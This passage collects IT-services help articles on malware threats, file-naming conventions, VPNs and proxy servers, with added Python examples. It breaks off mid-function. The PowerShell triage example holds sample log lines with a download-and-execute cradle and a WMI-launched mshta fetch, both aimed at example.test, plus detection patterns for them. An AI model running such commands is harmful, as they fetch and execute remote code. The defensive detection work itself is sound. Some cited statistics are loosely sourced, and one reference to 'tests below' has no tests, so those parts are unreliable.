Security Update – 2019

Article (PSA‑0011)

Why 2017 Was a Wake‑Up Call

From the rapid spread of WannaCry and NotPetya ransomware to the explosion of illicit cryptocurrency miners, 2017 reminded us that cyber‑threats can appear from unexpected places. Each year the quantity and variety of threats increase, and attackers continuously develop new ways to infiltrate devices while covering their tracks.

Key Threat Statistics (2017‑2023 Trend Highlights)

  • Ransomware – Over 2 billion records exposed worldwide (2022 Verizon DBIR).
  • Cryptocurrency miners – Symantec reported an 8,500 % increase in miner detections from 2016 to 2017; the trend continues with modern “cryptojacking” scripts on compromised websites.
  • Downloader families – + 92 % new variants reported in 2017; these “dropper” programs fetch additional malware after initial infection.
  • Mac malware – + 80 % new threats in 2017, and the numbers have kept climbing as macOS market share grows.

What Is Malware?

“Malware” = malicious software. It’s an umbrella term for any program that infects a computer without the user’s consent, including viruses, ransomware, spyware, ad‑ware, trojans, and cryptominers.

Common Infection Vectors (non‑exhaustive)

  • Infected email attachments.
  • Compromised USB thumb drives or external disks.
  • Downloads from untrusted websites or pirated software.
  • Malicious links in email, social‑media posts, instant‑message chats.
  • Drive‑by downloads from compromised legitimate websites, or from malicious ads served on them (malvertising), which can infect a browser without any click at all.

For a full glossary of terms, see our Threat Glossary.

Do You Need to Worry About Malware?

Absolutely. Cyber‑crime targets anyone with an Internet‑connected device—home users, small businesses, and large enterprises alike.

  • Business impact: A breach can expose customer data, trigger legal penalties (GDPR, HIPAA, PCI‑DSS), and damage reputation.
  • Personal impact: Family photos, financial documents, and personal communications can be stolen, encrypted, or deleted.
  • Recent surveys (Verizon 2023) show **≈ 1 in 3 people** reported a personal security incident in the past year.

Basic Protection Checklist (Start Here)

  1. Keep software updated. Enable automatic Windows/macOS updates, and patch third‑party apps as soon as patches appear.
  2. Use reputable antivirus/anti‑malware. Microsoft Defender (Windows 10/11) or a trusted third‑party solution (Bitdefender, Malwarebytes, ESET).
  3. Enable a firewall. Built‑in OS firewall is sufficient for most home users; ensure it’s turned on.
  4. Practice safe browsing. Don’t click unknown links, verify URLs, and avoid downloading from untrusted sites.
  5. Secure email. Use spam filters, enable MFA on email accounts, and never open unexpected attachments.
  6. Back up your data. Follow the 3‑2‑1‑0 rule (three copies, two media types, one off‑site, zero errors).
  7. Enable multi‑factor authentication (MFA) on any cloud service, VPN, and privileged accounts.

What to Do If You Suspect an Infection

  • Disconnect the device from the Internet (disable Wi‑Fi/Ethernet).
  • Run a full scan with an up‑to‑date anti‑malware product.
  • If the scan reports ransomware or a serious threat, isolate the machine and consider professional remediation.
  • Change passwords for any accounts accessed from the infected device (preferably from a clean device).
  • Restore files from a recent, verified backup if they have been encrypted or corrupted.

2025 Update – New Threat Landscape & Mitigations

Since the original 2017‑2023 overview, several important developments have reshaped the threat environment. Below is a concise addendum you can use to keep the article current.

1️⃣ Ransomware‑as‑a‑Service (RaaS) is Mainstream

  • Attack‑as‑a‑service platforms (e.g., LockBit 2.0, Hive, Blackcat) let low‑skill actors launch ransomware attacks for a subscription fee.
  • The 2024 Verizon DBIR found ransomware or another extortion technique in roughly one‑third of breaches, with pure‑extortion attacks (data theft with no encryption at all) on the rise.
  • Mitigation: Deploy **endpoint detection & response (EDR)** solutions (CrowdStrike Falcon, SentinelOne, Microsoft Defender for Endpoint) that can detect malicious behavior before encryption begins; maintain immutable backups (write‑once, read‑many) to thwart ransom demands.

2️⃣ AI‑Generated Phishing & Deepfake Social Engineering

  • Large‑language models are being used to craft hyper‑personalized phishing emails that bypass traditional keyword filters.
  • Deepfake video/audio calls are increasingly used to impersonate executives (“CEO fraud”).
  • Mitigation: Enforce email authentication (SPF, DKIM, and a DMARC policy of quarantine or reject rather than p=none), train staff with regular simulated phishing campaigns, and require out‑of‑band confirmation (a call back on a known number) for any payment or credential request, because MFA on privileged accounts does nothing against a convincing deepfake voice call.
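To make the DMARC part of that mitigation concrete, here is an added example (written for this page, not code from PSA Computer Services or any DMARC library) that applies the RFC 7489 disposition logic to a few constructed messages. The record, domains and results are assumptions; the organisational‑domain helper simply takes the last two labels, which a real implementation would replace with a Public Suffix List lookup.

```python
# Constructed DMARC record for the example domain. Real records live in the _dmarc.<domain> TXT record.
EXAMPLE_RECORD = "v=DMARC1; p=reject; sp=quarantine; adkim=s; aspf=r; pct=100; rua=mailto:dmarc@example.com"

NEXT_WEAKER = {"reject": "quarantine", "quarantine": "none", "none": "none"}


def parse_dmarc(record):
    """Split 'tag=value; tag=value' into a dict, filling in RFC 7489 defaults."""
    tags = {"adkim": "r", "aspf": "r", "pct": "100"}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or tags.get("p") not in NEXT_WEAKER:
        raise ValueError("not a usable DMARC record")
    tags.setdefault("sp", tags["p"])  # subdomain policy defaults to the main policy
    return tags


def org_domain(domain):
    """Organisational domain. Assumption: the last two labels. Production code must use the
    Public Suffix List, otherwise example.co.uk and evil.co.uk would count as 'aligned'."""
    return ".".join(domain.lower().split(".")[-2:])


def aligned(auth_domain, from_domain, mode):
    """Identifier alignment: strict ('s') needs an exact match, relaxed ('r') the same organisational domain."""
    if not auth_domain:
        return False
    if mode == "s":
        return auth_domain.lower() == from_domain.lower()
    return org_domain(auth_domain) == org_domain(from_domain)


def evaluate(from_domain, record, spf_result, spf_domain, dkim_result, dkim_domain, sample=0):
    """DMARC disposition for one message: 'pass', 'none', 'quarantine' or 'reject'.
    spf_domain is the envelope MAIL FROM domain SPF was checked against, dkim_domain the d= of a
    signature that verified. sample is a 0-99 draw used for pct sampling."""
    policy = parse_dmarc(record)
    spf_aligned_pass = spf_result == "pass" and aligned(spf_domain, from_domain, policy["aspf"])
    dkim_aligned_pass = dkim_result == "pass" and aligned(dkim_domain, from_domain, policy["adkim"])
    if spf_aligned_pass or dkim_aligned_pass:
        return "pass"  # one aligned, passing mechanism is enough
    is_org = org_domain(from_domain) == from_domain.lower()
    action = policy["p"] if is_org else policy["sp"]
    if sample >= int(policy["pct"]):
        # Sampled out of enforcement: RFC 7489 says apply the next weaker policy.
        action = NEXT_WEAKER[action]
    return action


if __name__ == "__main__":
    # A spoofed message: SPF passes for the attacker's own envelope domain, nothing aligns with the From.
    print(evaluate("example.com", EXAMPLE_RECORD, "pass", "attacker.test", "none", ""))
```

The second and fourth cases in the tests below are the ones that matter for CEO‑fraud mail: a passing SPF result for the attacker's own domain, or a valid DKIM signature from an unaligned domain, does not rescue a forged From header once the policy is reject.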

3️⃣ Supply‑Chain & Software‑Update Attacks

  • After the 2020 SolarWinds breach, attackers have focused on compromising software update mechanisms (e.g., recent Octave and EventX incidents in 2025).
  • Mitigation: Verify code signatures and published checksums on every update before it is installed, pin the signing certificate or key your updater trusts, restrict admin rights on update tools, and keep an inventory (SBOM) of what each update pulls in so a compromised component can be found quickly.

4️⃣ Cryptojacking Evolution

  • Browser‑based cryptojacking scripts now target **WebAssembly** for higher hash rates, often delivered via compromised ad‑networks.
  • Mobile devices are also being hijacked to mine Monero via malicious apps.
  • Mitigation: Use browser extensions that block crypto‑mining scripts (e.g., uBlock Origin, NoScript), keep browsers and plug‑ins up to date, and run mobile anti‑malware scans.

5️⃣ Rise of “File‑less” Malware & Living‑off‑the‑Land (LotL) Techniques

  • Attackers increasingly leverage legitimate OS utilities (PowerShell, Windows Management Instrumentation, mshta, rundll32) and Office macros that launch them, executing payloads from memory or the registry rather than dropping an executable that antivirus can scan.
  • Mitigation: Enable **Windows Defender Exploit Guard** (Attack Surface Reduction rules such as “Block all Office applications from creating child processes”), enforce **Application Control** (AppLocker or Microsoft Defender Application Control), and turn on PowerShell script‑block and module logging plus Constrained Language Mode. Note that the PowerShell execution policy is not a security boundary: it is bypassed with a single switch (-ExecutionPolicy Bypass) and should not be relied on.
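The following added example (not code from the original article or from any EDR vendor) shows the detection side of this: a small triage routine that runs over constructed process‑creation log lines, decodes a PowerShell -EncodedCommand payload, and scores living‑off‑the‑land indicators such as download cradles, WMI remote execution and an Office application spawning a script host. Host names, file names, URLs and the rule weights are assumptions.

```python
import base64
import re

# Constructed sample telemetry (not real logs): "host|parent process|process|command line".
# The encoded payload is built here so the sample matches what "powershell -enc" really carries:
# UTF-16LE text, base64-encoded.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_LOGS = [
    "ws01|explorer.exe|powershell.exe|powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
    f"ws02|cmd.exe|powershell.exe|powershell.exe -nop -w hidden -enc {ENCODED}",
    "ws03|cmd.exe|wmic.exe|wmic process call create \"mshta.exe http://example.test/x.hta\"",
    "ws04|WINWORD.EXE|powershell.exe|powershell.exe -nop -w hidden -c \"Start-Process calc.exe\"",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_SWITCH = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# (name, weight, pattern) applied to the raw command line plus any decoded payload.
CONTENT_RULES = [
    ("download-cradle", 3, re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b")),
    ("invoke-expression", 2, re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
    ("wmic-remote-exec", 3, re.compile(r"(?i)wmic(?:\.exe)?\s+.*process\s+call\s+create")),
    ("mshta-url", 3, re.compile(r"(?i)mshta(?:\.exe)?\s+\S*(?:https?:|javascript:|vbscript:)")),
    ("hidden-window", 1, re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("execution-policy-bypass", 1, re.compile(r"(?i)-(?:ep|executionpolicy)\s+bypass")),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe", "rundll32.exe"}
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or '' if there is none or it does not decode."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except ValueError:
        return ""


def analyze(line):
    """Score one log line; returns the host, the score, the matched rule names and any decoded payload."""
    host, parent, process, cmdline = line.split("|", 3)
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded:
        findings.append(("encoded-command", 2))
    text = cmdline + "\n" + decoded  # match on both the visible and the hidden command
    for name, weight, rx in CONTENT_RULES:
        if rx.search(text):
            findings.append((name, weight))
    if parent.lower() in OFFICE_APPS and process.lower() in SHELLS:
        findings.append(("office-spawns-shell", 4))  # macro-driven LotL: Office launching a script host
    score = sum(w for _, w in findings)
    return {"host": host, "score": score, "alert": score >= ALERT_THRESHOLD,
            "reasons": [n for n, _ in findings], "decoded": decoded}


def triage(lines):
    """Analyze every line and return the results sorted by score, highest first."""
    return sorted((analyze(line) for line in lines), key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_LOGS):
        print(f"{r['host']}: score={r['score']} alert={r['alert']} {r['reasons']}")
```

The signed inventory script on ws01 scores one point for its execution‑policy switch and stays below the alert line, which is the point: the switch alone is noise, while the decoded download cradle, the WMI‑launched mshta, and Word spawning PowerShell each cross the threshold on their own.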

6️⃣ Enhanced Defensive Technologies (2025)

  • Microsoft Defender XDR (formerly Microsoft 365 Defender) integrates email, endpoint, identity, and cloud‑app protection into correlated, analytics‑driven incidents.
  • Zero‑Trust Network Access (ZTNA) replaces traditional VPNs for many businesses, reducing lateral movement risk.
  • Some endpoint platforms offer **automated ransomware rollback** (e.g., SentinelOne’s Rollback) that restores files to their pre‑infection state. These rely on Windows Volume Shadow Copies, which many ransomware families delete first (vssadmin delete shadows), so rollback complements a real backup rather than replacing one.

7️⃣ Updated Statistics (2025)

  • IDC estimates **5.6 billion** devices will be infected with some form of malware by the end of 2025.
  • 2024 Palo Alto Networks report shows a **28 % increase** in credential‑theft attacks targeting remote‑work setups.
  • Cyber‑insurance premiums have risen an average of **23 %** year‑over‑year, reflecting the growing cost of ransomware and data‑breach remediation.

Need Help Right Now?

If you have questions about current threats, want a security assessment, or need assistance cleaning an infected system, call PSA Computer Services at (707) 506‑6802. We’ll help you protect your data and get you back online safely.

Directory Structure and File Name Conventions

Article (PSA‑0010)

Why Organised Folders & File Names Matter

Clear, consistent folder hierarchies and descriptive file names make it easy for anyone – you, a colleague, or a future replacement – to locate, sort, and understand data without having to open every file. When the structure is well‑planned you also reduce the risk of accidental overwrites, improve backup reliability, and simplify compliance audits.

General Principles

  • Consistency is king. Choose a convention and apply it everywhere.
  • Keep it human‑readable. A person should understand the purpose of a folder or file just by glancing at its name.
  • Stay within OS limits. Most file systems allow 255 characters per name; full paths are limited to 260 characters on Windows unless long‑path support is enabled, 4,096 bytes on Linux, and 1,024 bytes on macOS. Avoid nesting too deeply.
  • Separate concerns. Use top‑level directories for major categories (e.g., Personal, Business, Projects, Archives).

Designing a Folder Hierarchy

1️⃣ Top‑Level Categories

Start with a few broad folders that reflect the primary purpose of the data.

/Personal
/Business
/Shared
/Archives

2️⃣ Sub‑Categories by Type

Inside each top‑level folder, group by data type or function.

/Personal/
    Documents/
    Pictures/
    Music/
    Finance/
    Health/

/Business/
    Clients/
    Projects/
    Marketing/
    HR/
    Finance/

3️⃣ Time‑Based Segmentation (when relevant)

For large, chronological collections (photos, invoices, logs) add a date hierarchy. Use the ISO‑8601 format YYYY‑MM (or YYYY‑MM‑DD) – it sorts naturally.

/Personal/Pictures/2024/01_Jan/
/Business/Finance/Invoices/2024/01_Jan/

4️⃣ Project‑Oriented Segmentation

When a project spans multiple data types, create a dedicated project folder and nest type‑specific subfolders inside it.

/Business/Projects/ABC_Redesign/
    Docs/
    Designs/
    Deliverables/
    Archive/

File‑Naming Conventions – Actionable Rules

  1. Date format – Use YYYYMMDD (or YYYY‑MM‑DD) at the beginning or end of the name. This format sorts correctly and avoids ambiguity across regions.
  2. Scope identifiers – Add short, standard abbreviations for:
    • Project code – e.g., ABC for Project ABC.
    • Department or client initials – e.g., HR, ACME.
  3. Versioning – Use zero‑padded numbers (v001, v002) so that lexical sorting matches chronological order.
  4. Descriptive title – Include a concise subject (max 3‑4 words) that remains meaningful outside the folder context.
  5. Separator choice – Use either _ (underscore) or - (hyphen) consistently. CamelCase is acceptable but avoid mixing styles.
  6. File‑type extension – Keep the correct extension (e.g., .pdf, .xlsx) as the last element.

Example File Names

20240415_ABC_Proposal_v001.pdf
20240328_HR_EmployeeList_v003.xlsx
IMG_20240112_Jan_Holiday.jpg
2024-04-30_Invoice_ACME_001.pdf

Do’s & Don’ts (quick reference)

  • Do use only alphanumeric characters, underscores (_), hyphens (-), and periods for the extension.
  • Do keep names concise – aim for ≤ 30 characters (excluding extension) when possible.
  • Do make the name readable without relying on the folder path for context.
  • Don’t use spaces, tabs, commas, semicolons, or special symbols (e.g., # $ % & *).
  • Don’t use all caps for the entire name; reserve caps for abbreviations only.
  • Don’t embed version control software identifiers (like .git) in regular file names unless the file is truly part of a repo.
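Rules like these only survive if something checks them. The added example below (written for this page, not a tool from the article) validates names against the first form shown above, YYYYMMDD_SCOPE_Title_vNNN.ext, and rewrites legacy names into it; the other example styles on the page (the IMG_ photo name and the date‑first invoice name) would be reported as non‑compliant by it. The sample names, the fallback date and the project code are assumptions.

```python
import datetime
import os
import re

# Canonical form enforced here: YYYYMMDD_SCOPE_Title_vNNN.ext (scope is an upper-case abbreviation).
NAME_RE = re.compile(r"^(?P<date>\d{8})_(?P<scope>[A-Z0-9]{2,8})_(?P<title>[A-Za-z0-9_-]+)_v(?P<ver>\d{3})$")
FORBIDDEN = re.compile(r"[^A-Za-z0-9_.-]")  # spaces, commas, # $ % & * and friends
MAX_STEM = 30


def validate(filename):
    """Return a list of rule violations; an empty list means the name is compliant."""
    stem, ext = os.path.splitext(filename)
    problems = []
    if FORBIDDEN.search(filename):
        problems.append("contains spaces or forbidden characters")
    if not ext or ext != ext.lower():
        problems.append("missing or upper-case extension")
    if len(stem) > MAX_STEM:
        problems.append(f"stem longer than {MAX_STEM} characters")
    m = NAME_RE.match(stem)
    if not m:
        problems.append("does not match YYYYMMDD_SCOPE_Title_vNNN")
        return problems
    try:
        datetime.datetime.strptime(m["date"], "%Y%m%d")
    except ValueError:
        problems.append("date is not a real calendar date")
    return problems


def normalize(filename, fallback_date, scope=None):
    """Best-effort rewrite of a legacy name into the canonical form.
    fallback_date (YYYYMMDD, e.g. the file's modification date) is prepended when the name carries
    no date of its own; scope (e.g. a project code) is inserted when the name has no abbreviation."""
    stem, ext = os.path.splitext(filename)
    stem = re.sub(r"(\d{4})-(\d{2})-(\d{2})", r"\1\2\3", stem)                     # 2024-04-15 -> 20240415
    stem = re.sub(r"(?i)\bv(\d{1,3})\b", lambda m: f"v{int(m[1]):03d}", stem)   # v3 -> v003
    stem = re.sub(r"[^A-Za-z0-9-]+", "_", stem).strip("_")                        # spaces/symbols -> one '_'
    if not re.match(r"^\d{8}_", stem):
        stem = f"{fallback_date}_{stem}"
    parts = stem.split("_")
    if scope and not (len(parts) > 1 and re.fullmatch(r"[A-Z0-9]{2,8}", parts[1])):
        parts.insert(1, scope)
        stem = "_".join(parts)
    if not re.search(r"_v\d{3}$", stem):
        stem += "_v001"
    return stem + ext.lower()


if __name__ == "__main__":
    for name in ["20240415_ABC_Proposal_v001.pdf", "Proposal final (2).pdf"]:
        print(name, "->", validate(name) or "OK")
    print(normalize("Proposal final (2).pdf", "20240415", scope="ABC"))
```

The rewriter fixes what can be fixed mechanically (date format, zero padding, separators, extension case); it cannot invent a shorter title, so a normalized name can still come back from validate with a length complaint, which is the cue for a human to shorten it.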

Practical Tips for Implementation

  1. Document the standard. Create a one‑page cheat sheet and store it in the root folder (e.g., README_FileNaming.txt).
  2. Automate where possible. Use bulk‑rename tools (PowerRename in PowerToys, Bulk Rename Utility, or scripts) to retrofit existing files to the new convention.
  3. Leverage OS features. Use “Quick Access” (Windows) or “Favorites” (macOS) to pin frequently used top‑level folders.
  4. Regularly audit. Conduct a quarterly review to ensure new files follow the rules and to prune empty or obsolete folders.
  5. Back up consistently. A predictable folder structure improves backup reliability and makes restores faster.

When Working in a Team or Organization

  • Adopt the same hierarchy across all shared drives or cloud storage (OneDrive, Google Drive, SharePoint).
  • Agree on a master list of abbreviations (project codes, department IDs) to avoid collisions.
  • Include the naming policy in onboarding material and enforce it through periodic spot‑checks.

Bottom Line

A well‑designed folder tree combined with a clear, consistent file‑naming scheme turns a chaotic data dump into an organized, searchable library. Adopt the rules above, document them, and enforce them – the time you invest now saves countless hours later.

Need Assistance?

If you’d like help designing a folder hierarchy, creating a naming standard for your team, or cleaning up an existing file system, call PSA Computer Services at (707) 506‑6802.

Introduction to Virtual Private Network (VPN)

Article (PSA‑0009) – Introduction to Virtual Private Networks (VPN)

A Virtual Private Network (VPN) creates an encrypted “tunnel” that carries your Internet traffic through a public network (the Internet) to a private network – typically your workplace, home network, or a commercial VPN server. All data that travels through the tunnel is cryptographically protected, so anyone who intercepts the traffic sees only ciphertext (they can still see that you are talking to the VPN server, and how much).

What Can You Do With a VPN?

  • Network security & privacy – Public Wi‑Fi (coffee shops, airports, hotels) is a hot spot for “sniffing” attacks. A VPN encrypts every packet, preventing eavesdroppers from seeing which sites you visit or what credentials you type.
  • Remote access to work or home resources – Once connected, you appear to be on the same LAN as the VPN server. You can reach file shares, internal web apps, printers, databases, and other services that are otherwise blocked from the public Internet.
  • Access geo‑restricted content – By selecting a server in another country you can make websites think you are physically located there, letting you watch streaming services, use region‑locked tools, or test websites from multiple locales.
  • Bypass censorship – In countries where governments block social media, news sites, or messaging apps, a VPN routes traffic through a server outside the jurisdiction, restoring open Internet access.

How a VPN Works

A VPN consists of two main components:

  1. VPN client – Software you install on a device (Windows, macOS, Android, iOS, Linux, routers, etc.). The client authenticates to the VPN server and negotiates an encrypted tunnel.
  2. VPN server – The endpoint that receives your traffic, decrypts it, and forwards it to the destination network (or out to the public Internet). The server also enforces authentication (username/password, certificates, MFA) and may apply additional policies such as split‑tunneling or DNS filtering.

All traffic inside the tunnel is encrypted with modern authenticated ciphers: AES‑256‑GCM for OpenVPN and IKEv2/IPsec, ChaCha20‑Poly1305 in WireGuard. When the tunnel is up, the client routes either all traffic (full‑tunnel) or only selected traffic (split‑tunnel) through the VPN.

Common VPN Protocols (2025)

  • WireGuard – Fast, simple codebase, strong modern cryptography. Typical use: modern commercial VPNs and self‑hosted solutions.
  • OpenVPN (UDP/TCP) – Widely supported, mature, highly configurable. Typical use: enterprise remote‑access and cross‑platform compatibility.
  • IKEv2/IPsec – Excellent for mobile devices (auto‑reconnect), strong security. Typical use: corporate mobile‑device VPNs.

Should You Use a VPN?

Even if you never need to reach a private network, a VPN adds a useful layer of protection whenever you use public or untrusted Internet connections.

Benefits

  • Encrypts traffic, defending against passive eavesdropping and active “man‑in‑the‑middle” (MitM) attacks.
  • Hides your real IP address, making it harder for trackers or malicious sites to profile you.
  • Allows secure remote work without exposing internal services directly to the Internet.

Potential Downsides (and how to mitigate them)

  • Performance impact – Encryption adds overhead. Choose a fast protocol (WireGuard), a nearby server, and a reputable provider with sufficient bandwidth.
  • Trust in the VPN provider – The provider can see your traffic. Opt for a no‑logs policy, audited by a third party, or run your own self‑hosted VPN (e.g., a Raspberry Pi running WireGuard).
  • Split‑tunneling vs. full‑tunnel – Split‑tunneling improves speed but may leak DNS or other traffic. Enable DNS‑leak protection and a “kill switch” that blocks traffic if the VPN disconnects.
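The full‑tunnel, split‑tunnel and kill‑switch points above can be checked against a routing table. The added example below (not code from the article or from any VPN client) models the two configurations the way OpenVPN lays them out, does the longest‑prefix route lookup a kernel does, lists which destinations would leave in the clear, and shows what happens when the tunnel interface disappears with and without a kill switch. Interface names, addresses and the exemption list are assumptions.

```python
import ipaddress

# Constructed routing tables for illustration; nothing here is dumped from a real host.
TUNNEL_IF = "tun0"
VPN_SERVER = "203.0.113.10"  # assumed VPN endpoint address

# Full tunnel the way OpenVPN does it: two /1 routes out-rank the physical /0 default without deleting it.
FULL_TUNNEL = [
    ("0.0.0.0/1", "tun0"),
    ("128.0.0.0/1", "tun0"),
    ("0.0.0.0/0", "eth0"),
    ("192.168.1.0/24", "eth0"),    # local LAN stays local
    (VPN_SERVER + "/32", "eth0"),  # the encrypted packets themselves must leave on the physical NIC
]

# Split tunnel: only the corporate range goes through the VPN.
SPLIT_TUNNEL = [
    ("10.10.0.0/16", "tun0"),
    ("0.0.0.0/0", "eth0"),
    ("192.168.1.0/24", "eth0"),
    (VPN_SERVER + "/32", "eth0"),
]

# Destinations that may legitimately bypass the tunnel: the LAN and the VPN server itself.
EXEMPT = [ipaddress.ip_network("192.168.1.0/24"), ipaddress.ip_network(VPN_SERVER + "/32")]

# Constructed destinations a laptop on a cafe network might contact.
DESTINATIONS = [
    ("DNS resolver", "8.8.8.8"),
    ("intranet wiki", "10.10.5.20"),
    ("public web site", "198.51.100.7"),
    ("LAN printer", "192.168.1.50"),
]


def lookup(dst, table):
    """Longest-prefix match, the same decision a kernel makes for each packet."""
    addr = ipaddress.ip_address(dst)
    best = None
    for prefix, iface in table:
        net = ipaddress.ip_network(prefix)
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, iface)
    return best[1] if best else "unreachable"


def find_leaks(destinations, table):
    """Destinations whose packets would leave unencrypted on a physical interface."""
    leaks = []
    for label, dst in destinations:
        addr = ipaddress.ip_address(dst)
        iface = lookup(dst, table)
        if iface != TUNNEL_IF and not any(addr in net for net in EXEMPT):
            leaks.append((label, dst, iface))
    return leaks


def tunnel_down(table, kill_switch):
    """Model the tunnel interface disappearing. Without a kill switch the physical default route
    silently takes over; with one, the default route is replaced by a blackhole."""
    remaining = [(p, i) for p, i in table if i != TUNNEL_IF]
    if kill_switch:
        remaining = [(p, i) for p, i in remaining if p != "0.0.0.0/0"] + [("0.0.0.0/0", "blackhole")]
    return remaining


if __name__ == "__main__":
    print("split-tunnel leaks:", find_leaks(DESTINATIONS, SPLIT_TUNNEL))
    print("full tunnel, tunnel dropped, no kill switch:", lookup("8.8.8.8", tunnel_down(FULL_TUNNEL, False)))
    print("full tunnel, tunnel dropped, kill switch:", lookup("8.8.8.8", tunnel_down(FULL_TUNNEL, True)))
```

Two things the table makes visible: in split‑tunnel mode the DNS query to 8.8.8.8 never touches the tunnel at all, which is exactly the DNS leak the checklist warns about; and in full‑tunnel mode the physical default route is still present underneath, so the moment the tunnel interface goes away traffic flows over it unless a kill switch has blackholed it.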

Best‑Practice Checklist

  1. Select a trustworthy VPN (no‑logs, reputable jurisdiction, independent audit).
  2. Use modern protocols – WireGuard (its cipher suite is fixed), or OpenVPN/IKEv2 configured for AES‑256‑GCM rather than legacy CBC ciphers.
  3. Enable a kill switch to prevent accidental exposure if the tunnel drops.
  4. Configure DNS‑leak protection – ensure all DNS queries travel through the VPN.
  5. Prefer full‑tunnel for public Wi‑Fi unless you have a specific reason for split‑tunnel.
  6. Combine with MFA for the VPN authentication step.
  7. Keep client software up to date – VPN apps receive security patches just like any other software.

When to Consider a Self‑Hosted VPN

If you need full control over the server, have compliance requirements, or simply want to avoid any third‑party logging, you can install a VPN on your own hardware:

  • Raspberry Pi or small Linux box running WireGuard or OpenVPN.
  • Edge/router‑based VPN (many ASUS, Netgear, and Ubiquiti routers include built‑in VPN servers).
  • Cloud VM (e.g., AWS Lightsail, DigitalOcean) with a VPN installed for remote‑access to cloud resources.

Bottom Line

For everyday users, a reputable commercial VPN provides a quick, user‑friendly way to protect privacy, secure public‑network use, and reach remote resources. For businesses, pairing a corporate VPN with a zero‑trust architecture (MFA, least‑privilege network policies, and conditional access) offers the strongest protection.

Disclaimer

This article is for **informational purposes only**. PSA Computer Services does **not** provide VPN services, nor do we sell, install, or manage VPN solutions. For assistance selecting a VPN provider or setting up a self‑hosted tunnel, please consult a qualified network or security specialist.

“There is wisdom in a multitude of counselors.”

Introduction to Proxy Servers

Article (PSA‑0008) – Introduction to Proxy Servers

Every device that talks to the Internet must have an address that other computers can use to reply. That address is your **public IP address** – the number your ISP (Internet Service Provider) assigns to the modem/router that connects you to the outside world.

Where Does the Public IP Come From?

  • The ISP (e.g., AT&T, Suddenlink, Frontier, local fiber providers) hands out a dynamic or static IP address when you sign up for service.
  • Most residential connections use **dynamic IPs** that can change when the modem restarts; business lines often use **static IPs** for easier remote access.
  • Your public IP reveals roughly *where* the request originated (city‑level location) and is linked to the account you purchased from the ISP.

What Is a Proxy Server?

The word *proxy* means “substitute.” In networking, a **proxy server** acts as an intermediary between your computer (the client) and the destination server on the Internet. The client sends its request to the proxy; the proxy forwards the request, receives the response, and then passes that response back to the client.

Common Types (brief overview)

  • Forward proxy – Used by end‑users (you) to reach any public website. This is what most “web proxy” services provide.
  • Reverse proxy – Placed in front of a web‑server farm to distribute traffic, perform caching, or add security (e.g., Cloudflare, Nginx).
  • Transparent proxy – Intercepts traffic without requiring manual configuration; often used in corporate or school networks.
  • SOCKS5 proxy – Works below HTTP, relaying arbitrary TCP connections and UDP datagrams (useful for SSH, torrent clients, or other non‑HTTP apps). It forwards traffic but does not encrypt it.

How a Forward Proxy Works – Simple Flow

  1. Your browser (or another app) is configured to use a proxy (IP + port).
  2. You request https://psa-2.com in the address bar.
  3. The request is sent to the proxy server instead of directly to the Internet.
  4. The proxy opens a connection to psa-2.com and forwards your request.
  5. The web server sends the page back to the proxy.
  6. The proxy relays the page to your browser. To the web server, the request appears to come from the proxy’s IP, not yours.

Benefits of Using a Proxy

  • IP masking – The destination sees the proxy’s address, helping protect your personal IP.
  • Content filtering – Organizations can block known malicious sites or categories (e.g., gambling, social media).
  • Cache & bandwidth saving – Frequently accessed resources can be stored locally, reducing external traffic.
  • Access control – Requiring authentication before allowing outbound web traffic.
  • Basic anonymity – Combined with header or user‑agent changes, a proxy can make it harder for trackers to uniquely fingerprint a browser.

Potential Risks (Fair Warning)

  • Untrusted or free proxies may log every URL you visit, inject ads, or even serve malware.
  • Man‑in‑the‑middle (MitM) threats – Plain HTTP through a proxy is fully readable and modifiable by the proxy: it can rewrite pages, inject scripts, or swap a download for a trojaned one.
  • Loss of TLS protection – With a CONNECT tunnel the proxy sees only the destination host and port and relays encrypted bytes it cannot read. A proxy that *terminates* (intercepts) TLS, which requires its CA certificate to be trusted on your device, decrypts everything in between, whether or not it re‑encrypts on the way to the destination.
  • Performance impact – Extra hop can add latency, especially with overloaded or distant proxy servers.
  • Legal & policy concerns – Some services block known proxy IP ranges; using a proxy to evade geo‑restrictions can violate terms of service.
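The flow above and the CONNECT caveat in the risks list can be seen in a few lines of request handling. The added example below (written for this page, not code from the article or from any proxy product) parses two constructed client requests, rewrites a plain‑HTTP request for the upstream server the way RFC 7230 requires of a forward proxy, and, for CONNECT, shows that the proxy learns only the host and port before it starts copying opaque bytes. The proxy name, the requests and the hop‑by‑hop header list are assumptions.

```python
from urllib.parse import urlsplit

# Headers that are between client and proxy only and must not be forwarded upstream.
HOP_BY_HOP = {"proxy-authorization", "proxy-connection", "connection", "keep-alive",
              "te", "trailer", "transfer-encoding", "upgrade"}
PROXY_NAME = "1.1 psa-proxy"  # assumed name the proxy announces in the Via header


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, target, version, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return method, target, version, headers, body


def handle(raw):
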